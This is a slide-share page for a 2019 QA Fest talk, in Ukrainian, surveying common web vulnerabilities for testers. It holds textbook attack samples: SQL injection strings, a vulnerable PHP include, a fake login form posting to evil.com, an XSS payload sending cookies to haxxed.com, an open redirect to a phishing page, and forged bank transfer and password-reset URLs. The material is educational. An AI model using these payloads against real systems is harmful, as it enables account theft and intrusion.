QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

0 likes•982 views

The document outlines various web application vulnerabilities and attack vectors, including techniques like SQL injection, cross-site scripting (XSS), and remote code execution. It provides examples of security risks associated with improper configuration, unsafe file uploads, and authentication issues. Additionally, it mentions security headers that can help protect against attacks and highlights common weaknesses in web application security practices.

Education

KYIV 2019
Короленко Сергій
Всі вразливості у веб додатках

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

Bugcrowd’s Vulnerability Rating Taxonomy

RCE
Remote Code Execution | Code injection

Stacked queries
UNION query-based
Error-based
Boolean-based blind
Time-based blind
1 AND (ascii(substr((SELECT version()),1,1))) > 52—
1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)—
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x
FROM information_schema.TABLES GROUP BY x)a)--
1 UNION ALL SELECT NULL,version()--
1; SELECT version()--
SQL Injection

FILE INCLUSION
<?php
$file = $_GET[«file»];
include(“/var/www/backend/$file”);
?>
https://example.com/?page=contact.php

HTML Injection
Hi! My name is <h1>hacker</h1>
Hello
HACKER
Hi! My name is <h1>Log in to view a content</h1>
<form action="http://evil.com">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit">
</form>

XSS | Cross Site Scripting
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

Open Redirection
https://bank.com/redirect.php?go=http://attacker.com/phish/

http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280
http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483
CSRF | Cross-Site Request Forgery

SSRF| Server Side Request Forgery
http://example.com/?url=http://localhost/server-status

Weak password change/reset
http://bank.com/reset_password?email=ololo@example.com&token=1561324612
http://bank.com/reset_password?email=ololo@example.com&token=1561324754
http://bank.com/reset_password?email=ololo@example.com&token=1561324698
MD5 ("ololo@example.com") = 83fa8dbfe2725ﬀ513c4028a7f60df36
http://bank.com/reset_password?email=ololo@example.com&token=
83fa8dbfe2725ff513c4028a7f60df36
http://bank.com/reset_password?email=ololo@example.com&token=
83fa8dbfe2725ff513c4028a7f60df36

Broken Access Control
http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!

Password

API Keys

/.git/
Sensitive Data Exposure

Directory Listing DirSearch (backups, logs, etc.)

Privileged user: uid=0(root)
No Rate Limits
CAPTCHA Bypass

Security Headers
•Server headers that protect against attacks
◦HTTP Strict Transport Security
◦Content Security Policy
◦Access-Control-Allow-Origin
◦X-FrameOptions
◦X-XSS-Protection
◦X-Content-Type-Options
•Server headers that leak information
◦Server
◦X-Powered-By
◦X-AspNet-Version

https://www.youtube.com/OWASPKyiv
https://www.facebook.com/owaspkyiv
https://owasp.slack.com/messages/chapter-ua/

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках

3. Bugcrowd’s Vulnerability Rating Taxonomy

4. RCE Remote Code Execution | Code injection

5. RCE Remote Code Execution | Code injection

11. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection

12. XXE |XML external entity injection

13. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php

14. DIRECTORY TRAVERSAL

15. UNSAFE FILE UPLOAD

16. UNSAFE FILE UPLOAD

18. CRLF injection (CRLF, rn, %0A%0D)

19. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>

20. XSS | Cross Site Scripting

21. XSS Stored/Reflected

22. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

23. Open Redirection https://bank.com/redirect.php?go=http://attacker.com/phish/

24. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery

25. CSRF | Cross-Site Request Forgery

26. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status

27. Default Credentials/Configuration

28. Authentication Bypass

29. Weak Password Policy

30. Weak password reset question/answer

31. Weak password change/reset http://bank.com/[email protected]&token=1561324612 http://bank.com/[email protected]&token=1561324754 http://bank.com/[email protected]&token=1561324698 MD5 ("[email protected]") = 83fa8dbfe2725ﬀ513c4028a7f60df36 http://bank.com/[email protected]&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/[email protected]&token= 83fa8dbfe2725ff513c4028a7f60df36

32. Bypass 2FA

33. Privilege Escalation

34. Broken Access Control http://bank.com/admin/[email protected]&newpass=3.1415pec!

35. COOKIES Attributes

36. Session Fixation

37. Password API Keys /.git/ Sensitive Data Exposure

38. Directory Listing DirSearch (backups, logs, etc.)

39. Unencrypted Communication

40. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass

41. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version

42. Detailed Error

44. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин

More Related Content

More from QAFest (20)

Recently uploaded (20)

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин